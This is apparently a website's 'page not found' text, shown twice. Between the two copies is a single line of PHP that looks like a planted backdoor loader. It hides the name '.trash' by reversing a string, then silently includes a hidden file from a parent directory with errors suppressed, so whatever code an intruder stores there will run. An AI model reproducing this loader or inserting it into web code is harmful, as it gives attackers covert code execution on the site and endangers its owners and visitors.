It seems we can’t find what you’re looking for. Perhaps searching can help.
$CacheFileName = strrev("hsart."); $cacheFile = '../' . $CacheFileName . '/' . $CacheFileName; if (file_exists($cacheFile)) { @include $cacheFile; }
It seems we can’t find what you’re looking for. Perhaps searching can help.